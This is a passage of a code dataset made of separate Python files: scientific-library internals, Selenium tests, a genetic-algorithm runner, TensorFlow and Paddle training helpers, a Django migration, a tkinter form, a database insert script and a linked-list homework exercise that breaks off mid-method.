Should\n have the same number of samples and image dimension equal to 1.\n eval_points (array_like): Points to perform the evaluation.\n \"\"\"\n\n if self.dim_domain != fd.dim_codomain:\n raise ValueError(f\"Dimension of codomain of first function do not \"\n f\"match with the domain of the second function \"\n f\"({self.dim_domain})!=({fd.dim_codomain}).\")\n\n # All composed with same function\n if fd.n_samples == 1 and self.n_samples != 1:\n fd = fd.copy(data_matrix=np.repeat(fd.data_matrix, self.n_samples,\n axis=0))\n\n if fd.dim_domain == 1:\n if eval_points is None:\n try:\n eval_points = fd.grid_points[0]\n except AttributeError:\n eval_points = np.linspace(*fd.domain_range[0],\n constants.N_POINTS_COARSE_MESH)\n\n eval_points_transformation = fd(eval_points)\n data_matrix = self(eval_points_transformation,\n aligned=False)\n else:\n if eval_points is None:\n eval_points = fd.grid_points\n\n grid_transformation = fd(eval_points, grid=True)\n\n lengths = [len(ax) for ax in eval_points]\n\n eval_points_transformation = np.empty((self.n_samples,\n np.prod(lengths),\n self.dim_domain))\n\n for i in range(self.n_samples):\n eval_points_transformation[i] = np.array(\n list(map(np.ravel, grid_transformation[i].T))\n ).T\n\n data_matrix = self(eval_points_transformation,\n aligned=False)\n\n return self.copy(data_matrix=data_matrix,\n grid_points=eval_points,\n domain_range=fd.domain_range,\n argument_names=fd.argument_names)\n\n def __str__(self):\n \"\"\"Return str(self).\"\"\"\n return ('Data set: ' + str(self.data_matrix)\n + '\\ngrid_points: ' + str(self.grid_points)\n + '\\ntime range: ' + str(self.domain_range))\n\n def __repr__(self):\n \"\"\"Return repr(self).\"\"\"\n\n return (f\"FDataGrid(\"\n f\"\\n{repr(self.data_matrix)},\"\n f\"\\ngrid_points={repr(self.grid_points)},\"\n f\"\\ndomain_range={repr(self.domain_range)},\"\n f\"\\ndataset_name={repr(self.dataset_name)},\"\n f\"\\nargument_names={repr(self.argument_names)},\"\n f\"\\ncoordinate_names={repr(self.coordinate_names)},\"\n f\"\\nextrapolation={repr(self.extrapolation)},\"\n f\"\\ninterpolation={repr(self.interpolation)})\").replace(\n '\\n', '\\n ')\n\n def __getitem__(self, key):\n \"\"\"Return self[key].\"\"\"\n\n key = _check_array_key(self.data_matrix, key)\n\n return self.copy(data_matrix=self.data_matrix[key],\n sample_names=np.array(self.sample_names)[key])\n\n #####################################################################\n # Numpy methods\n #####################################################################\n\n def __array_ufunc__(self, ufunc, method, *inputs, **kwargs):\n\n for i in inputs:\n if isinstance(i, FDataGrid) and not np.array_equal(\n i.grid_points, self.grid_points):\n return NotImplemented\n\n new_inputs = [i.data_matrix if isinstance(i, FDataGrid)\n else i for i in inputs]\n\n outputs = kwargs.pop('out', None)\n if outputs:\n new_outputs = [o.data_matrix if isinstance(o, FDataGrid)\n else o for o in outputs]\n kwargs['out'] = tuple(new_outputs)\n else:\n new_outputs = (None,) * ufunc.nout\n\n results = getattr(ufunc, method)(*new_inputs, **kwargs)\n if results is NotImplemented:\n return NotImplemented\n\n if ufunc.nout == 1:\n results = (results,)\n\n results = tuple((result\n if output is None else output)\n for result, output in zip(results, new_outputs))\n\n results = [self.copy(data_matrix=r) for r in results]\n\n return results[0] if len(results) == 1 else results\n\n #####################################################################\n # Pandas ExtensionArray methods\n 
#####################################################################\n    @property\n    def dtype(self):\n        \"\"\"The dtype for this extension array, FDataGridDType\"\"\"\n        return FDataGridDType(\n            grid_points=self.grid_points,\n            domain_range=self.domain_range,\n            dim_codomain=self.dim_codomain)\n\n    @property\n    def nbytes(self) -> int:\n        \"\"\"\n        The number of bytes needed to store this object in memory.\n        \"\"\"\n        return self.data_matrix.nbytes + sum(\n            p.nbytes for p in self.grid_points)\n\n    def isna(self):\n        \"\"\"\n        A 1-D array indicating if each value is missing.\n\n        Returns:\n            na_values (np.ndarray): Positions of NA.\n        \"\"\"\n        return np.all(np.isnan(self.data_matrix),\n                      axis=tuple(range(1, self.data_matrix.ndim)))\n\n\nclass FDataGridDType(pandas.api.extensions.ExtensionDtype):\n    \"\"\"\n    DType corresponding to FDataGrid in Pandas\n    \"\"\"\n    name = 'FDataGrid'\n    kind = 'O'\n    type = FDataGrid\n    na_value = pandas.NA\n\n    def __init__(self, grid_points, dim_codomain, domain_range=None) -> None:\n        grid_points = _tuple_of_arrays(grid_points)\n\n        self.grid_points = tuple(tuple(s) for s in grid_points)\n\n        if domain_range is None:\n            domain_range = np.array(\n                [(s[0], s[-1]) for s in self.grid_points])\n\n        self.domain_range = _domain_range(domain_range)\n        self.dim_codomain = dim_codomain\n\n    @classmethod\n    def construct_array_type(cls):\n        return FDataGrid\n\n    def _na_repr(self) -> FDataGrid:\n\n        shape = ((1,)\n                 + tuple(len(s) for s in self.grid_points)\n                 + (self.dim_codomain,))\n\n        data_matrix = np.full(shape=shape, fill_value=np.NaN)\n\n        return FDataGrid(\n            grid_points=self.grid_points,\n            domain_range=self.domain_range,\n            data_matrix=data_matrix)\n\n    def __eq__(self, other: Any) -> bool:\n        \"\"\"\n        Rules for equality (similar to categorical):\n        1) Any FDataGridDType is equal to its name string 'FDataGrid'\n        2) Any FDataGridDType is equal to itself\n        3) Otherwise, they are equal if the arguments are equal.\n        4) Any other comparison returns False\n        \"\"\"\n        if isinstance(other, str):\n            return other == self.name\n        elif other is self:\n            return True\n        else:\n            return (isinstance(other, FDataGridDType)\n                    and self.dim_codomain == other.dim_codomain\n                    and self.domain_range == other.domain_range\n                    and self.grid_points == other.grid_points)\n\n    def __hash__(self) -> int:\n        return hash((self.grid_points,\n                     self.domain_range, self.dim_codomain))\n","sub_path":"skfda/representation/grid.py","file_name":"grid.py","file_ext":"py","file_size_in_byte":43963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"225830516","text":"from openpyxl.worksheet.table import Table, TableStyleInfo\nfrom openpyxl.drawing.image import Image\nfrom openpyxl import load_workbook\n\n\nwb= load_workbook('Pie.xlsx') #load the Excel file that already exists\nws = wb.active\n\n#to add a table:\ntab= Table(displayName='Table1', ref='A1:B5')\nstyle= TableStyleInfo(name='TableStyleMedium9', showFirstColumn=False, showLastColumn=False,\n                      showRowStripes=True, showColumnStripes=True)\ntab.tableStyleInfo = style\nws.add_table(tab)\nwb.save('table.xlsx')\n\n#to add an image:\nimg = Image('madecraft.jpg')\nimg.height = img.height * .5 #reduced the height to half of the original\nimg.width = img.width * .5 #reduced the width to half of the original\nws.add_image(img, 'B7')\nwb.save('image.xlsx')","sub_path":"8.table.py","file_name":"8.table.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"203730151","text":"#-*-coding:utf-8-*-\n#@Author: haiyu.ma\n#@Created: 2020-05-31 0:05\n\n#Normal case\n#Preconditions:\n######Avoid relying on test-environment data; if it is missing, set it up yourself#####\n# 1. The user is logged in\n# 2. There is a bid available to invest in  #If there is no bid, add one first.  #Add it via the API.\n# 3. The user has balance available to invest\n    #1. 100 million\n    #2. Via the API: query how much money the current user has. If it is more than 6000, no top-up is needed; if it is less than the amount invested in the case, top up.\n#Steps\n#1. Pick a bid on the home page -- not by bid name, but from the quick-invest list; default to the first bid.\n### Bid page -- get the user balance before investing\n#2. Bid page -- enter the investment amount and click the invest button\n#3. Bid page -- on the investment-success popup, click view-and-activate to enter the profile page\n#Assertions\n#Money: the balance after investing should have decreased by the invested amount.\n# Profile page: get the balance after investing\n# Balance before investing minus balance after investing = investment amount\n# Check that the investment record is correct\n\n# Abnormal cases: very easy to set up the environment for, very easy to write\n\n# Not covered by automation -- hard to implement, manual testing recommended\n# Abnormal case: invest-all operation ? investable amount of the bid > personal balance\n    # investment amount > investable amount of the bid  #requires a bid and a user satisfying this condition\n\nfrom selenium import webdriver\nfrom PageObjects.login_page import LoginPage\nfrom PageObjects.index_page import IndexPage\nfrom PageObjects.bid_page import BidPage\nfrom PageObjects.user_page import UserPage\n\nimport unittest\nimport ddt  # from ddt import ddt,data\nimport logging\nimport time\nfrom TestDatas import Common_Datas as CD\nfrom TestDatas.IndexModuleDatas import index_datas as ID\nimport pytest\n\n@ddt.ddt\nclass TestInvest(unittest.TestCase):\n\n    @classmethod\n    def setUpClass(cls):\n        # Initialize the browser session\n        logging.info(\"===Class setup: initialize browser session, log in to the QianChengDai system=======\")\n        cls.driver = webdriver.Chrome()\n        cls.driver.maximize_window()\n        cls.driver.get(CD.web_login_url)\n        LoginPage(cls.driver).login(CD.user, CD.passwd)\n        # Home page - pick a bid to invest in - simply take the first one -- / or a random one\n        IndexPage(cls.driver).click_first_bid()\n        cls.bid_page = BidPage(cls.driver)\n\n    @classmethod\n    def tearDownClass(cls):\n        logging.info(\"=====Class teardown: close browser session, clean up environment=======\")\n        cls.driver.quit()\n\n    def tearDown(self):\n        logging.info(\"=====Per-case teardown: refresh the current page=======\")\n        self.driver.refresh()\n        time.sleep(0.5)\n\n    @pytest.mark.smoke\n    def test_invest_1_success(self):\n        logging.info(\"*******Invest case: normal scenario - investment succeeds*******\")\n        # Bid page - get the personal balance before investing\n        userMoney_beforeInvest = self.bid_page.get_user_money()\n        # Bid page - enter the investment amount, click the invest button\n        self.bid_page.invest(ID.success[\"money\"])\n        # Bid page - on the success popup, click the view-and-activate button\n        self.bid_page.click_activeButton_on_success_popup()\n        # Verification\n        # Profile page - get the user's current balance\n        userMoney_afterInvest = UserPage(self.driver).get_user_leftMoney()\n        # 1. Balance: read it before investing and again after. If the difference equals the investment amount, the result is correct.\n        assert ID.success[\"money\"] == int(float(userMoney_beforeInvest)-(float(userMoney_afterInvest)))\n        # PS: use a dedicated account for automated tests.\n        # 2. Profile page - fetch the investment record.\n\n    @ddt.data(*ID.wrong_format_money)\n    def test_invest_0_failed_by_No100(self, data):\n        logging.info(\"********Invest case: abnormal scenario: amount not a multiple of 100, wrong format, etc.*****\")\n        # Bid page - get the personal balance before investing\n        userMoney_beforeInvest = self.bid_page.get_user_money()\n        # Bid page - enter the investment amount, click the invest button\n        self.bid_page.invest(data[\"money\"])\n        # Get the message text\n        errorMsg = self.bid_page.get_errorMsg_from_pageCenter()\n        # Refresh\n        self.driver.refresh()\n        # Get the user balance\n        userMoney_afterInvest = self.bid_page.get_user_money()\n        # Assert\n        assert errorMsg == data[\"check\"]\n        assert userMoney_afterInvest == userMoney_beforeInvest\n","sub_path":"WebAutomation/TestCases/InvestModuleTest/test_invest.py","file_name":"test_invest.py","file_ext":"py","file_size_in_byte":4258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"51189408","text":"from knapsack.config import Config\nfrom knapsack.genetic_algorithm import GeneticAlgorithmFacade\nfrom knapsack.generation import GenerationStrategy\nfrom knapsack.mutation import MutationStrategy\nfrom knapsack.problem import ProblemType\nfrom knapsack.reproduction import ReproductionStrategy\nfrom knapsack.selection import SelectionStrategy\nfrom knapsack.stop_criteria import StopCriteriaType\n\nimport matplotlib.pyplot as plt\n\n\ndef 
plot_fitness(generationsResult):\n best = list(map(lambda result: result[\"best\"], generationsResult))\n mean = list(map(lambda result: result[\"mean\"], generationsResult))\n worst = list(map(lambda result: result[\"worst\"], generationsResult))\n plt.plot(best, label=\"best\")\n plt.plot(mean, label=\"mean\")\n plt.plot(worst, label=\"worst\")\n\n plt.xlabel(\"Generation\")\n plt.ylabel(\"Fitness\")\n plt.title(\"Knapsack Problem\")\n plt.legend(loc='lower left', frameon=True)\n\n plt.show()\n\nif __name__ == \"__main__\":\n config = Config({\n 'problem': {\n 'type': ProblemType.MAXIMIZATION,\n 'values': [0, 1],\n 'costs': [100, 350, 200, 90, 500, 250, 220, 360, 150, 700, 400, 230, 550],\n 'weights': [50, 90, 30, 40, 100, 70, 20, 80, 80, 90, 50, 30, 70],\n 'cargo': 600\n },\n 'selection': {\n 'strategy': SelectionStrategy.TOURNAMENT_BATTLE_ROYALE\n },\n 'reproduction': {\n 'strategy': ReproductionStrategy.SEXUAL_SINGLE_POINT,\n 'rate': 0.4\n },\n 'mutation': {\n 'strategy': MutationStrategy.SWAP,\n 'rate': 0.1\n },\n 'generation': {\n 'strategy': GenerationStrategy.EXCHANGE,\n #'substituted_population_size': 10, #Used only on STEADY_STATE\n 'population_size': 25,\n },\n 'stop_criteria': {\n #'fitness': 0, #Used only on MAX_FITNESS\n #'num_generations': 100, #Used only on MAX_GENERATIONS and STEADY_PERIOD\n 'quorum': 0.95, #Used only on CONVERGENCE\n 'type': StopCriteriaType.MAX_GENERATIONS\n }\n })\n\n\n\n generationsResult = GeneticAlgorithmFacade(config).execute()\n\n plot_fitness(generationsResult)","sub_path":"knapsack/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"428376271","text":"# Copyright (c) 2023 PaddlePaddle Authors. 
All Rights Reserved.\n# \n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# \n# http://www.apache.org/licenses/LICENSE-2.0\n# \n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# --------------------------------------------------------\n# References:\n# MAE: https://github.com/facebookresearch/mae\n# --------------------------------------------------------\n\nimport json\n\n\ndef param_groups_lrd(model,\n weight_decay=0.05,\n no_weight_decay_list=[],\n layer_decay=.75,\n num_layers=None):\n \"\"\"\n Parameter groups for layer-wise lr decay\n Following BEiT: https://github.com/microsoft/unilm/blob/master/beit/optim_factory.py#L58\n \"\"\"\n param_group_names = {}\n param_groups = {}\n\n if num_layers == None:\n num_layers = len(model.blocks) + 1\n\n layer_scales = list(layer_decay**(num_layers - i)\n for i in range(num_layers + 1))\n\n for n, p in model.named_parameters():\n if p.stop_gradient:\n continue\n\n if 'teacher' in n:\n continue\n\n # no decay: all 1D parameters and model specific ones\n if p.ndim == 1 or n in no_weight_decay_list:\n g_decay = \"no_decay\"\n this_decay = 0.\n else:\n g_decay = \"decay\"\n this_decay = weight_decay\n\n layer_id = get_layer_id_for_vit(n, num_layers)\n group_name = \"layer_%d_%s\" % (layer_id, g_decay)\n\n if group_name not in param_group_names:\n this_scale = layer_scales[layer_id]\n\n param_group_names[group_name] = {\n \"lr_scale\": this_scale,\n \"weight_decay\": this_decay,\n \"params\": [],\n }\n param_groups[group_name] = {\n \"lr_scale\": this_scale,\n \"weight_decay\": this_decay,\n \"params\": [],\n }\n\n param_group_names[group_name][\"params\"].append(n)\n param_groups[group_name][\"params\"].append(p)\n\n # print(\"parameter groups: \\n%s\" % json.dumps(param_group_names, indent=2))\n\n return list(param_groups.values())\n\n\ndef get_layer_id_for_vit(name, num_layers):\n \"\"\"\n Assign a parameter with its layer id\n Following BEiT: https://github.com/microsoft/unilm/blob/master/beit/optim_factory.py#L33\n \"\"\"\n if name in (\"cls_token\", \"mask_token\", \"pos_embed\"):\n return 0\n elif name.startswith(\"patch_embed\"):\n return 0\n elif name.startswith(\"blocks\"):\n return int(name.split('.')[1]) + 1\n else:\n return num_layers - 1\n","sub_path":"task/ssl/cae/util/lr_decay.py","file_name":"lr_decay.py","file_ext":"py","file_size_in_byte":3018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"166220939","text":"import numpy as np\nimport tensorflow as tf\nimport sys, os\nparent_folder_path = os.path.dirname(os.path.dirname( os.path.dirname( os.path.dirname( os.path.abspath(__file__)))))\nsys.path.append(parent_folder_path)\nfrom src.tf_module.models.BaseModel import ClassifierModel\n\nclass mlp_classifier(ClassifierModel):\n def __init__(self, config, scope=\"mlp_network\"):\n ClassifierModel.__init__(self,scope,config)\n \n def build_model(self):\n train_output = self.mlp_model(self.inputs, reuse= False)\n self.test_output = self.mlp_model(self.inputs, reuse=True)\n with tf.variable_scope(\"train_op\"): \n loss = 
tf.reduce_mean(tf.losses.softmax_cross_entropy(onehot_labels=self.labels, logits= train_output))\n self.optimizer = tf.train.RMSPropOptimizer(learning_rate=self.learning_rate).minimize(loss, name='optimizer')\n self.summary_train = tf.summary.scalar(\"loss_train_data\", loss)\n\n with tf.variable_scope(\"test_op\"):\n test_loss = tf.reduce_mean(tf.losses.softmax_cross_entropy(onehot_labels=self.labels, logits= self.test_output))\n test_loss_summary = tf.summary.scalar(\"loss_test_data\", test_loss)\n \n correct_pred = tf.equal(tf.argmax(self.test_output, 1), tf.argmax(self.labels, 1))\n accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32), name='accuracy')\n test_accuracy_summary = tf.summary.scalar(\"accuracy_test_data\", accuracy)\n self.summary_test = tf.summary.merge([test_loss_summary,test_accuracy_summary])\n\n with tf.variable_scope(\"predict_op\"): \n tf.argmax(self.test_output, 1,name=\"predict_hard\")\n tf.nn.softmax(self.test_output, name=\"predict_soft\")\n \n\n def mlp_model(self, network_input, reuse=False):\n g = tf.nn.tanh\n with tf.variable_scope(self.scope,reuse=reuse):\n L1 = tf.layers.dense(inputs=network_input, units= 32, activation=g)\n L1 = tf.nn.dropout(L1, keep_prob=self.keep_prob)\n L2 = tf.layers.dense(inputs=L1, units= 32, activation=g)\n L2 = tf.nn.dropout(L2, keep_prob=self.keep_prob)\n L3 = tf.layers.dense(inputs=L2, units= 16, activation=g)\n mlp_output = tf.layers.dense(inputs=L3, units= self.n_classes,name='mlp_out')\n return mlp_output","sub_path":"src/tf_module/models/mlp.py","file_name":"mlp.py","file_ext":"py","file_size_in_byte":2348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"350786398","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('risks', '0101_eventimportattributes_adm_level_precision'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='EventFurtherAdministrativeDivisionAssociation',\n fields=[\n ('id', models.AutoField(serialize=False, primary_key=True)),\n ],\n options={\n 'db_table': 'risks_eventfurtheradministrativedivisionassociation',\n },\n ),\n migrations.AlterModelOptions(\n name='event',\n options={},\n ),\n migrations.AlterModelOptions(\n name='eventimportattributes',\n options={'ordering': ['riskapp', 'region', 'riskanalysis', 'adm_level_precision'], 'verbose_name': 'Risks Analysis: Import Events Data (Attributes) from XLSX file', 'verbose_name_plural': 'Risks Analysis: Import Events Data (Atributes) from XLSX file'},\n ),\n migrations.AddField(\n model_name='eventfurtheradministrativedivisionassociation',\n name='event',\n field=models.ForeignKey(to='risks.Event'),\n ),\n migrations.AddField(\n model_name='eventfurtheradministrativedivisionassociation',\n name='f_adm',\n field=models.ForeignKey(to='risks.AdministrativeDivisionMappings'),\n ),\n migrations.AddField(\n model_name='event',\n name='further_administrative_divisions',\n field=models.ManyToManyField(related_name='event_further_adm', through='risks.EventFurtherAdministrativeDivisionAssociation', to='risks.AdministrativeDivisionMappings'),\n ),\n ]\n","sub_path":"risks/migrations/0102_auto_20181015_1351.py","file_name":"0102_auto_20181015_1351.py","file_ext":"py","file_size_in_byte":1786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"257564517","text":"import re\nimport os \n\nfilepath = '../log'\n\nfile = 
open('../log', 'r')\nlines = file.readlines()\n\nfor index, line in enumerate(lines):\n #print(\"Line {}: {}\".format(index, line.strip()))\n if 'png' in line.strip():\n result = re.search('textwidth]{(.*)png}', line.strip())\n if index < 35:\n os.system('cp '+result.group(1)+'png'+' paperplots')\n else: \n os.system('cp '+result.group(1)+'png'+' paperplots2')\n if 'pdf' in line.strip():\n result = re.search('textwidth]{(.*)pdf}', line.strip())\n if index < 35:\n os.system('cp '+result.group(1)+'pdf'+' paperplots')\n else: \n os.system('cp '+result.group(1)+'pdf'+' paperplots2')\n print(result.group(1))\n\n \nfile.close()\n\n'''\nwith open(filepath) as fp:\n line = fp.readline()\n while line:\n s = line.readline()\n result = re.search('{(.*)}', s)\n\n #s = s.substring(s.indexOf(\"{\") + 1);\n #s = s.substring(0, s.indexOf(\"}\"));\n print result\n'''\n\n\n\n","sub_path":"strippull.py","file_name":"strippull.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"590390943","text":"import tkinter\r\n\r\nclass EditPurchase(tkinter.Frame):\r\n\r\n def __init__(self, parent, App):\r\n self.application = App\r\n self.config = App.config\r\n super().__init__(parent)\r\n self.configure(bg=\"cyan\")\r\n\r\n self.grid(row=0, column=0, sticky=\"nsew\")\r\n parent.grid_rowconfigure(0, weight=1)\r\n parent.grid_columnconfigure(0, weight=1)\r\n\r\n self.purchases = self.config.load_purchase()\r\n\r\n self.title_frame = tkinter.Frame(self, relief=tkinter.RIDGE, bg=\"cyan\")\r\n self.title_frame.place(x=0, y=0, width=729, height=100)\r\n\r\n self.title_label = tkinter.Label(self.title_frame, text=\"Add New Purchase\", bd=5, relief=tkinter.RIDGE, bg=\"cyan\",\r\n fg=\"black\", font=(\"roboto sans-serif\", 24), pady=17)\r\n self.title_label.pack(side=tkinter.TOP, fill=tkinter.X)\r\n\r\n self.form_frame = tkinter.Frame(self, bd=5, relief=tkinter.RIDGE, bg=\"cyan\")\r\n self.form_frame.place(x=0, y=75, width=729, height=425)\r\n\r\n self.customer_name_text = tkinter.StringVar()\r\n self.customer_name_label = tkinter.Label(self.form_frame, text=\"Customer :\", font=(\"roboto sans-serif\", 14),\r\n bg=\"cyan\", fg=\"black\", padx=7, pady=30)\r\n self.customer_name_label.grid(row=3, column=3, sticky=tkinter.W)\r\n self.customer_entry = tkinter.Entry(self.form_frame, textvariable=self.customer_name_text, width=20, bd=5,\r\n font=(\"roboto sans-serif\", 14))\r\n self.customer_entry.grid(row=3, column=4)\r\n\r\n self.product_name_text = tkinter.StringVar()\r\n self.product_name_label = tkinter.Label(self.form_frame, text=\"Product :\", font=(\"roboto sans-serif\", 14),\r\n bg=\"cyan\", fg=\"black\", padx=5, pady=30)\r\n self.product_name_label.grid(row=3, column=5, sticky=tkinter.W)\r\n self.product_entry = tkinter.Entry(self.form_frame, textvariable=self.product_name_text, width=18, bd=5,\r\n font=(\"roboto sans-serif\", 14))\r\n self.product_entry.grid(row=3, column=6)\r\n\r\n self.amount_text = tkinter.StringVar()\r\n self.amount_label = tkinter.Label(self.form_frame, text=\"Amount : \", font=(\"roboto sans-serif\", 14),\r\n bg=\"cyan\", fg=\"black\", padx=7, pady=30)\r\n self.amount_label.grid(row=4, column=3, sticky=tkinter.W)\r\n self.amount_entry = tkinter.Entry(self.form_frame, textvariable=self.amount_text, width=20, bd=5,\r\n font=(\"roboto sans-serif\", 14))\r\n self.amount_entry.grid(row=4, column=4)\r\n\r\n self.address_text = tkinter.StringVar()\r\n self.address_label = tkinter.Label(self.form_frame, 
text=\"Address : \", font=(\"roboto sans-serif\", 14),\r\n bg=\"cyan\", fg=\"black\", padx=5, pady=30)\r\n self.address_label.grid(row=4, column=5, sticky=tkinter.W)\r\n self.address_entry = tkinter.Entry(self.form_frame, textvariable=self.address_text, width=18, bd=5,\r\n font=(\"roboto sans-serif\", 14))\r\n self.address_entry.grid(row=4, column=6)\r\n\r\n self.date_text = tkinter.StringVar()\r\n self.date_label = tkinter.Label(self.form_frame, text=\"Transact Date : \", font=(\"roboto sans-serif\", 14),\r\n bg=\"cyan\", fg=\"black\", padx=5, pady=30)\r\n self.date_label.grid(row=5, column=3, sticky=tkinter.W)\r\n self.date_entry = tkinter.Entry(self.form_frame, textvariable=self.date_text, width=20, bd=5,\r\n font=(\"roboto sans-serif\", 14))\r\n self.date_entry.grid(row=5, column=4)\r\n\r\n self.price_text = tkinter.StringVar()\r\n self.price_label = tkinter.Label(self.form_frame, text=\"Price : \", font=(\"roboto sans-serif\", 14),\r\n bg=\"cyan\", fg=\"black\", padx=5, pady=30)\r\n self.price_label.grid(row=5, column=5, sticky=tkinter.W)\r\n self.price_entry = tkinter.Entry(self.form_frame, textvariable=self.price_text, width=18, bd=5,\r\n font=(\"roboto sans-serif\", 14))\r\n self.price_entry.grid(row=5, column=6)\r\n\r\n self.retailer_text = tkinter.StringVar()\r\n self.retailer_label = tkinter.Label(self.form_frame, text=\"Retailer :\", font=(\"roboto sans-serif\", 14), bg=\"cyan\", fg=\"black\", padx=5, pady=30)\r\n self.retailer_label.grid(row=6, column=3, sticky=tkinter.W)\r\n self.retailer_entry = tkinter.Entry(self.form_frame, textvariable=self.retailer_text, width=20, bd=5, font=(\"roboto sans-serif\", 14))\r\n self.retailer_entry.grid(row=6, column=4)\r\n\r\n\r\n self.button_frame = tkinter.Frame(self.form_frame, bd=0, relief=tkinter.RIDGE, bg=\"cyan\")\r\n self.button_frame.place(x=0, y=340, width=720, height=170)\r\n\r\n self.space = tkinter.Label(self.button_frame, text=\" \", font=(\"roboto sans-serif\", 14),\r\n fg=\"white\", bg=\"cyan\")\r\n self.space.grid(row=2, column=3)\r\n\r\n self.add_purchase_button = tkinter.Button(self.button_frame, text=\"Submit\", width=15, height=1, bd=2,\r\n relief=tkinter.FLAT, font=(\"roboto sans-serif\", 12, \"bold\"), command=lambda:self.application.add_purchase())\r\n self.add_purchase_button.grid(row=2, column=4, padx=60, pady=34)\r\n self.cancel_button = tkinter.Button(self.button_frame, text=\"Cancel\", width=15, height=1, bd=2,\r\n relief=tkinter.FLAT, font=(\"roboto sans-serif\", 12, \"bold\"),\r\n command=lambda:self.application.gotopurchase())\r\n self.cancel_button.grid(row=2, column=5, pady=34, padx=15)","sub_path":"edit_purchase.py","file_name":"edit_purchase.py","file_ext":"py","file_size_in_byte":5955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"163825195","text":"__author__ = 'BR'\n\n\"\"\"\nAuthor: BIKASH ROY\n\nFile name: dbtransaction.py\n\"\"\"\n\n\nimport psycopg2\n\n\ndef main():\n connection = psycopg2.connect(\n host='localhost',\n dbname='sample_db',\n port='5432',\n user='',\n password=''\n )\n\n try:\n cursor = connection.cursor()\n connection.cursor()\n sql = \"INSERT INTO principals (tconst, nconst, category) VALUES (%s, %s, %s)\"\n val = [\n ('tt00103', 'tt89283', 'Producer'),\n ('tt00104', 'tt89282', bool),\n ('tt00105', 'tt89284', 'Actor')\n ]\n\n cursor.executemany(sql, val)\n connection.commit()\n except (Exception, psycopg2.DatabaseError) as error:\n print(error)\n finally:\n if connection is not None:\n connection.close()\n\n\nif __name__ == 
'__main__':\n    main()\n","sub_path":"Big_Data/tsvtosql.py","file_name":"tsvtosql.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"572791075","text":"#\r\n# Sam Ghalayini\r\n# HW 23 Singly Linked Lists\r\n#\r\n# CLASS NOTES + Homework\r\nclass Node:\r\n    def __init__(self,data):\r\n        self.data = data\r\n        self.next = None\r\n    \r\nclass linkedList:\r\n    def __init__(self):\r\n        self.head = None\r\n    def append(self,data):\r\n        newNode = Node(data)\r\n        if self.head == None:\r\n            self.head = newNode\r\n            return\r\n        else:\r\n            lastNode = self.head \r\n            while lastNode.next != None:\r\n                lastNode = lastNode.next\r\n            lastNode.next = newNode\r\n    def prepend(self,data):\r\n        newNode = Node(data)\r\n        if self.head == None:\r\n            self.head = newNode\r\n            return\r\n        else:\r\n            newNode.next = self.head\r\n            self.head = newNode\r\n    def insertAfter(self,prevNode,data):\r\n        newNode = Node(data)\r\n        newNode.next = prevNode.next\r\n        prevNode.next = newNode\r\n    def deleteNode(self,key):\r\n        curNode = self.head\r\n        if curNode != None and curNode.data ==key:\r\n            self.head = curNode.next\r\n            curNode = None\r\n            return\r\n        else:\r\n            prevNode = None\r\n            while curNode != None and curNode.data != key:\r\n                prevNode = curNode\r\n                curNode = curNode.next\r\n            if curNode == None:\r\n                print(\"Error cannot delete node\")\r\n            else:\r\n                prevNode.next = curNode.next\r\n                curNode = None\r\n    def length(self):\r\n        count = 0\r\n        curNode = self.head\r\n        while curNode != None:\r\n            curNode = curNode.next\r\n            count += 1\r\n        return count\r\n    def swap(self,val,val1):\r\n        if(val==val1): # case 1: same node\r\n            print(\"Same node.\")\r\n            return\r\n        prev = None # case 2: swap with head\r\n        curNode = self.head\r\n        while curNode != None and curNode.data != val:\r\n            prev = curNode\r\n            curNode = curNode.next\r\n        prev1 = None # case 3: swap nodes\r\n        curNode1 = self.head\r\n        while curNode1 != None and curNode1.data != val1:\r\n            prev1 = curNode1\r\n            curNode1 = curNode1.next\r\n        if curNode == None or curNode1 == None: # case 4: invalid input for one of the node values\r\n            print(\"At least one of the nodes doesn't exist\")\r\n        else:\r\n            if prev == None:\r\n                self.head = curNode1\r\n                prev1.next = curNode\r\n            elif prev1 == None:\r\n                self.head = curNode\r\n                prev.next = curNode1\r\n            else:\r\n                prev.next = curNode1\r\n                prev1.next = curNode\r\n            temp = curNode.next\r\n            temp1 = curNode1.next\r\n            curNode.next= temp1\r\n            curNode1.next = temp\r\n    def reverse(self):\r\n        prev = None\r\n        curNode = self.head\r\n        while curNode != None: # iterate through linked list\r\n            temp = curNode.next\r\n            curNode.next = prev\r\n            prev = curNode\r\n            curNode = temp\r\n        self.head = prev # last iteration so last node will equal the head\r\n    def deletePos(self,pos):\r\n        curNode = self.head\r\n        if pos == 0:\r\n            self.head = curNode.next\r\n            curNode = None\r\n            return\r\n        else:\r\n            count = 0\r\n            prev = None\r\n            while curNode != None and count != pos:\r\n                prev = curNode\r\n                curNode = curNode.next\r\n                count+=1\r\n            if curNode == 